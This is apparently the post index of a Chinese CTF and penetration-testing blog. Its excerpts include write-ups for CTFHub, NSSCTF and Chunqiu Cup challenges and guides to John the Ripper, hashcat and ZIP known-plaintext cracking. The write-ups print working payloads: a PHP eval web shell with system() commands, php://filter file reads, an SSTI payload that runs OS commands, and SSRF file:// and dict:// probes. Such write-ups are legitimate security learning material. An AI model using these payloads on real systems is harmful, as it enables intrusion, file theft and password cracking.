梦~醒🍇

发表于 2025-03-19 | 更新于 2025-03-19 | web渗透 | 工具使用

[TOC] 什么是johnJohn the Ripper 是一款大受欢迎的、免费的开源软件。也是一个基于字典的快速破解密码的工具，是一款用于在已知密文的情况下尝试破解出明文的破解密码软件，支持目前大多数的加密算法，如 DES 、 MD4 、 MD5 等。 John the Ripper 支持字典破解方式和暴力破解方式。它支持多种不同类型的系统架构，包括 Unix 、 Linux 、 Windows 、 DOS 模式、 BeOS 和 OpenVMS ，主要目的是破解不够牢固的 Unix/Linux 系统密码。 john一般是kali自带。 john参数表john 命令的具体参数选项如下表：选项描述 –single single crack 模式，使用配置文件中的规则进行破解 –wordlist=FILE–stdin 字典模式，从 FILE 或标准输入中读取词汇 –rules 打开字典模式的词汇表切分规则 –incremental[=MODE] 使用增量模式 –external=MODE 打开外部模式或单词过滤，使用 [Li ...

刷题2025.3.15

发表于 2025-03-15 | 更新于 2025-03-18 | CTF | web-wp

题目来源：NSSCTF平台 [TOC] [SWPUCTF 2021 新生赛]easyupload2.0 考点：文件上传绕过进行文件上传测试，首先上传jpg文件，然后抓包改成php文件，结果提示php文件不能上传。上传htaccess文件也不行，于是改成后缀为phtml。 phtml也会被当成php解析。发现上传成功，用蚁剑连接，找到flag. NSSCTF{76333d4d-efe1-4a18-acf5-09bd35c8ca3b} [SWPUCTF 2021 新生赛]PseudoProtocols 考点：PHP伪协议，文件包含先扫一下目录，发现什么都没有，然后看到需要传参，又要读取hint.php，使用filter伪协议 1php://filter/read=convert.base64-encode/resource=/var/www/html/hint.php 得到一串base64，解码 12345PD9waHANCi8vZ28gdG8gL3Rlc3QyMjIyMjIyMjIyMjIyLnBocA0KPz4=<?php//go to /test22 ...

本地搭建deepseek

发表于 2025-02-19 | 更新于 2025-05-18 | 其他学习笔记 | 其他学习笔记

准备阶段先下载Ollama和chatbox安装包 12Ollama: https://ollama.com/chatbox: https://chatboxai.app/zh 在电脑上安装后即可搭建步骤安装之后，按win+r，输入cmd进入命令框然后我们在回到ollama的官网：复制后面的代码到命令框下载，等待它下载完然后打开chatbox，选择使用本地模型模型位置点击三角形位置选择安装好的deepseek模型，上下文消息数量20那个位置记得选择不限制。根据自己喜好设置其他选项，点击保存，然后就可以试试对话了。至此初始化就完成了，基本的功能就完成了。启动注意事项每次在chatbox启动的时候，都要先在命令框输入 12ollama list #查看modeollama run modename #运行mode 然后才能在chatbox本地使用。否则会报错没有网络。

CTFHub技能树-rce

发表于 2025-02-01 | 更新于 2025-02-01 | CTF | web-wp

[TOC] eval执行1234567 <?phpif (isset($_REQUEST['cmd'])) { eval($_REQUEST["cmd"]);} else { highlight_file(__FILE__);}?> 没有任何绕过，直接执行 12?cmd=system('ls /');?cmd=system('cat /f*'); ctfhub{953435d20ae6652047e620c4} 文件包含审计代码，发现过滤了flag关键字，include包含文件的内容，根据提示，发现有个shell.txt文件，而且文件内容是接受传参请求，可以利用这个漏洞。所以思路就是文件包含shell.txt文件，然后传参触发eval函数来rce。 1?file=shell.txt&ctfhub=system('cat /f*'); ctfhub{e95bf56ca09c475de96779f8} ...

两种明文攻击

发表于 2025-01-20 | 更新于 2025-01-21 | CTF | misc姿势

一、完整的明文文件要达成明文攻击需要注意以下三点 ①完整的明文文件 ②明文文件需要被相同的压缩算法标准压缩（也可理解为被相同压缩工具压缩） ③明文对应文件的加密算法需要是 ZipCrypto（ZipCrypto又分为ZipCrypto Deflate/ZipCrypto Store）使用ARCHPR进行明文攻击破解时长应该不超过5分钟，运行至5分钟左右可以手动停止，ARCHPR会跳出来破解出的三个key。当然，这个结果并不是压缩包的密码，而是一个去除密码的压缩包xxx_decrypted.zip，把这个文件直接解开就可以了。用以上方法需要已知一整个明文文件。二、已知一部分明文使用rbkcrack只需要知道加密压缩包内容的连续12个字节，即可进行攻击破解。同时，结合各类已知的文件格式，更扩宽了ZIP已知明文攻击的攻击面。 rbkcrack下载地址： https://github.com/Aloxaf/rbkcrack rbkcrack常用参数 1234567-C 加密的压缩包-c 压缩包内加密的文件-p 明文内容-k 输入key-o 偏移量-d 攻击完成后导出解密文 ...

2024年春秋杯网络安全联赛冬季赛wp-1.19

发表于 2025-01-19 | 更新于 2025-01-22 | CTF | 比赛wp

[TOC] webeasy_php 考点：文件上传绕过，截断，源码审计打开网站后，可以下载源码，先下载源码，然后再扫一下网站目录配合源码审计，审计过程省略。其中在文件上传的目录下已经有文件了，再结合提示可以知道，不用再自己上传文件。那么就需要触发文件，看这里代码可以知道在/file.php页面中可以进行url的get传参，然后会将参数值过滤后进行高亮，触发反序列化链。但是这里的过滤中，是f1ag而不是flag，所以其实没有过滤flag关键词。因此结合源码，直接构造payload: 1?file=/flag 1flag{a16dcb7549915546893a27a6d7927615} easy_code 考点：利用PHP特性绕过，filter伪协议访问/robots.txt 可以看到有 gogogo.php ctfer 参数有三个检测，只需要用科学计数法，PHP 会自动四舍五入 1ctfer=6.66999999999999999999999999999999999999999e2 Hackbar 里设置 co ...

2024年春秋杯网络安全联赛冬季赛wp-1.18

发表于 2025-01-18 | 更新于 2025-01-18 | CTF | 比赛wp

Weevil’s Whisper 考点：流量分析，代码审计下载附件，进行流量分析，看到上传的代码进行代码审计可以知道，在http中的返回结果是由$p$kh$r$kf组成的，而$p,$kh,$kf是固定的，所以可以提取出来$r。再看代码，$r是$o进行一系列加密而成，而$o就是执行完成后返回的结果，所以只需要写脚本反解$r就能出现结果。 exp: 提取$r的脚本： 123456789101112131415161718192021222324252627282930313233343536373839404142import re# 示例字符串列表strings = [ "lFDu8RwONqmag5ex45089b3446eeSaoCUFRXAGExNS5kaQ==4e0d86dbcf92", "lFDu8RwONqmag5ex45089b3446eeSaoCUVRSBofUNDFgR2Uu4e0d86dbcf92", "lFDu8RwONqmag5ex45089b3446eeSaoyZWJkN2U=4e0d ...

2024年春秋杯网络安全联赛冬季赛wp-1.17

发表于 2025-01-17 | 更新于 2025-02-19 | CTF | 比赛wp

[TOC] webeasy_flask 考点：ssti 注入打开网页，发现有个登录，试试直接登录看到 url 处是进行 get 传参，试试 111 联想到 ssti 漏洞，于是用9验证一下，发现就是 ssti 模板注入进行 ssti 模板注入漏洞一系列，构造 payload: 1{{cycler.next.__globals__.__builtins__.__import__('os').popen('cat flag').read()}} flag{48ad0cde8345c8b2608933ac4e85147e} file_copy 考点：无回显，filter协议根据代码，可以看到是post传参，参数是path。（抓包也可以看）直接使用脚本（https://github.com/ProbiusOfficial/PHPinclude-labs/tree/bbb08b030623d481be51edea063433b8d77b2ee7/Level%2017/php_filte ...

hashcat常规使用方法

发表于 2025-01-17 | 更新于 2025-01-18 | CTF | web姿势

-m hash的类型指定hash的加密类型，默认是MD5类型在对应的类型前面有它的id,可以通过id来指定类型当我们想要找一个类型在hashcat支不支持的时候，例如windows系统加密的是NTML,可以执行命令hashcat64.exe -h | findstr NTLM可以看到NTLM的ID号为1000 -a 攻击方式破解密码的方式分别有: highlighter- 1c 123450 | Straight 字典破解1 | Combination 组合破解3 | Brute-force 掩码破解6 | Hybrid Wordlist + Mask 混合字典 + 掩码7 | Hybrid Mask + Wordlist 混合掩码 + 字典掩码当没有字典的时候，可以使用掩码指定密码的每一位是什么类型的字符，首先我们知道密码有多少位例如:?d?d?d?d?d?d?d?d代表密码为8为数字，?u?l?l?l?l?d?d?d代表密码为7位，首个字母大写，然后四个小写字母，最后三个数字破解windows hash密码使用字典爆破windows hashhashcat64. ...

CTFHub技能树-SSRF

发表于 2024-12-02 | 更新于 2025-10-29 | CTF | web-wp

[TOC] 内网访问根据提示和url处可知，要访问本地的flag.php文件使用http协议 1http://127.0.0.1/flag.php ctfhub{3a8065a8c91c9f5c801ea8f8} 伪协议读取文件根据提示可知，文件是在web目录下，使用伪协议 web目录一般是/var/www/html 1file:///var/www/html/flag.php ctfhub{f43a8521d7cdb6dec67225e6} 端口扫描根据提示知道，端口范围是8000-9000 使用dict协议，然后抓包爆破端口可以看到端口应该是8137，使用http访问 1url=http://127.0.0.1:8137 ctfhub{f0f29c3e738e6fc924ca1e67} POST请求先直接访问flag.php 1url=127.0.0.1/flag.php 得到一个输入框，查看源码，发现key 提交key出现页面我们尝试通过file协议读取index.php 和flag.php的页面源码 1 ...

ctfshow萌新web

发表于 2024-12-01 | 更新于 2025-10-29 | CTF | web-wp

来源：ctfshow [TOC] web1 考点：inval()函数漏洞，sql注入 1234567891011121314151617181920212223242526272829303132333435363738394041<html><head> <title>ctf.show萌新计划web1</title> <meta charset="utf-8"></head><body><?php# 包含数据库连接文件include("config.php");# 判断get提交的参数id是否存在if(isset($_GET['id'])){ $id = $_GET['id']; # 判断id的值是否大于999 if(intval($id) > 999){ # id 大于 999 直接退出并返回错误 die("id e ...

HUBU新星杯wp

发表于 2024-11-30 | 更新于 2025-02-19 | CTF | 比赛wp

[TOC] webRobots Leak 考点：git泄露开启题目先扫目录 git泄露，直接拉取git到本地，然后有个.git文件进入到文件里，查看日志找到关键词flag，查看一下内容拿到一半flag。查看一下其他日志内容，都没什么营养，然后看看有没有文件，用git stash pop 发现拉取了一个.flag.exe，查看得到下一半合起来就是全部flag HUBUCTF{431332b1-e91f-4437-9036-b9059539886f} ez-http 考点：http基础 http基础，按要求一步一步来，建议抓包放进重放器里面，方便剩下的就是改referrer，添加一个ip(网上搜一下，多试)，然后改cookie等等。（不截图了） Random_Door 考点：python脚本，php伪协议打开网站嗯，好，满天星，写个脚本挨着读 1234567891011121314151617181920212223import requestsimport timebase_url = &q ...